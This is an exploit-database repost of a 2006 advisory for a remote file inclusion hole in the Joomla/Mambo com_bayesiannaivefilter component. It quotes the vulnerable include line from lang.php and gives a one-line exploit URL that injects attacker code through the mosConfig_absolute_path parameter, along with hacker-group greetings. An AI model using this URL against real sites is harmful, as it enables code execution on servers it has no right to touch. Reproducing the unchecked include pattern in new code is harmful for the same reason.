[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Joomla com_bayesiannaivefilter Component <= 1.1 Inclusion Vulnerability

Author
Pablin77
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-620
Category
web applications
Date add
29-07-2006
Platform
unsorted
=======================================================================
Joomla com_bayesiannaivefilter Component <= 1.1 Inclusion Vulnerability
=======================================================================




#############################Pablin77 - XTech Inc Group################################
#
# com_bayesiannaivefilter Mambo Component Remote File Inclusion (mosConfig_absolute_path)
#
#################################################################################
#
# Discovered By Pablin77
#
#
# contact: Pablin_77 [at] Argentina [dot] com
#
#
#          Lebanon-Israel...STOP! No War!!!
#
#                     peace, that's all
#
#  This is a massive cyber-protest, we are :
#
#  eno7 | XTech Inc | byond crew | hackbsd crew | digitalmind
#
#
################################################################################
#
# Greetz: eno7 , Byond Crew
#
# Special Gretz:XTeh Inc (Status-x, Furtivo, sys7ech)
#
###############################################################################

code from lang.php

include_once($mosConfig_absolute_path.'/administrator/components/com_bayesiannaivefilter/languages/'.$mosConfig_lang.'.php');
  } else { 
    include_once($mosConfig_absolute_path.'/administrator/components/com_bayesiannaivefilter/languages/english.php');
  }

Web:
http://forge.joomla.org/sf/scm/do/listRepositories/projects.com_bayesianspamfiltering/scm

exploit:
http://site.com/[path]/administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=[Evilcode]

##############################MARY TE AAAAAMOOOO!!!############################
###############################################################################




#  0day.today [2024-11-15]  #